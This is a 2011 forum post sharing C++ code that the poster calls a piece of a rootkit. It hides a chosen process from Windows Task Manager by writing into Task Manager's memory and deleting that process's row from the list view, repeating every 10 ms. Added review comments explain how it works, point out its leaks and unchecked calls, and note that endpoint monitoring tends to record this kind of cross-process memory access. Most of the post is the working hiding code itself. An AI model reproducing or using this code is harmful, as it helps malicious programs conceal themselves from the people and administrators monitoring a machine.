[C++] Rootkit (not checked, info inside) 02-21-2011, 04:20 PM
Found code for hiding your .exe from taskmgr.
So to me it's a piece of a rootkit, well...
author: Bling111
I DIDN'T CHECK IT!
Here we go:
Code:
#include <windows.h>
#include <iostream>
#include <commctrl.h>
// EnumChildWindows callback. For the child window whose class is
// "SysListView32" and whose window text is "Processes", it looks up the row
// whose text matches `temp` and deletes that row from the control.
//
// hWnd   - child window handed in by the enumeration.
// lParam - unused.
// Returns TRUE on every call, so the enumeration always continues.
//
// Review notes:
// - Only the rows displayed by that one list-view control are altered. Nothing
//   in this function changes what the operating system reports about running
//   processes; the named process is not touched at all.
// - To hand the control a LVFINDINFO it can read, the code opens the process
//   that owns the window with PROCESS_ALL_ACCESS, allocates memory in it and
//   writes to it. That open / remote-allocate / remote-write sequence is
//   cross-process memory access, which endpoint monitoring commonly records.
// - The process handle is never closed and the two remote allocations are
//   never freed. The caller in this listing polls every 10 ms, so both
//   accumulate for as long as the matching window exists.
BOOL CALLBACK EnumChildProcedure(HWND hWnd,LPARAM lParam){
// Return values of GetWindowText/GetClassName are not checked; if either call
// fails, the strcmp calls below read an uninitialised buffer.
char name[256];
GetWindowText(hWnd,name,256);
char ClassName[256];
GetClassName(hWnd,ClassName,256);
LVFINDINFO info;
memset(&info,0,sizeof(LVFINDINFO));
// Despite its name, nIndex receives the id of the process that owns hWnd.
DWORD nIndex;
int Id;
char temp[]="taskmgr.exe"; //this name can be changed to the name of the desired program to be hidden
//i chose taskmgr.exe for this example because everybody will have that program in common if they are testing my program and checking task manager
info.flags = LVFI_STRING |LVFI_PARTIAL;
if((strcmp(ClassName,"SysListView32")==0)&&(strcmp(name,"Processes")==0))
{
GetWindowThreadProcessId(hWnd,(LPDWORD)&nIndex);
// Requests every access right on the owning process, although the calls below
// only allocate and write memory in it.
HANDLE Process=OpenProcess(PROCESS_ALL_ACCESS,FALSE, nIndex);
// OpenProcess returns NULL on failure; this is a relational comparison of the
// handle against 0 rather than an explicit NULL test.
if(0<Process)
{
// Neither allocation result is checked before it is used.
void *Address=VirtualAllocEx(Process,NULL,sizeof(info),MEM_RESERVE|MEM_COMMIT,PAGE_RE​ADWRITE);
void *Addressx=VirtualAllocEx(Process,NULL,sizeof(temp),MEM_RESERVE|MEM_COMMIT,PAGE_R​EADWRITE);
// Results of both remote writes are ignored.
WriteProcessMemory(Process,Addressx,&temp,sizeof(temp),0);
// psz is set to the remote address, so the copy of `info` written next is only
// meaningful inside the target process.
info.psz=(char*)Addressx;
WriteProcessMemory(Process,Address,&info,sizeof(info),0);
Id=SendMessage(hWnd,LVM_FINDITEM,-1,(LPARAM) Address);
if(Id!=-1)
SendMessage(hWnd,LVM_DELETEITEM,Id,0);
// No CloseHandle(Process) and no VirtualFreeEx for Address/Addressx follow.
}
}
// `name` is an array, so this comparison is never true and the FALSE branch
// is dead code.
if(name==NULL)
return FALSE;
return TRUE;
}
// Looks for a top-level window whose title is exactly "Windows Task Manager"
// (any window class) and, if one exists, runs EnumChildProcedure over its
// child windows. Returns without doing anything when no such window is found.
//
// Review note: the match is on the window title string alone, so it depends on
// that exact caption being present.
void Vigil()
{
HWND hWnd = NULL;
hWnd = ::FindWindow(NULL,"Windows Task Manager");
if(!hWnd)
{
return;
}
// The third argument is delivered to the callback as lParam, which the
// callback does not read.
EnumChildWindows(hWnd,EnumChildProcedure,NULL);
}
// Entry point: calls Vigil() in an endless loop with a 10 ms pause between
// iterations. There is no exit condition, so the program has to stay running
// for the whole time, and `return 0` is never reached.
//
// NOTE(review): presumably the call is repeated because the list view is
// repopulated by its owner; that is not shown in this listing.
int main()
{
while(1)
{
Vigil();
Sleep(10);
}
return 0;
}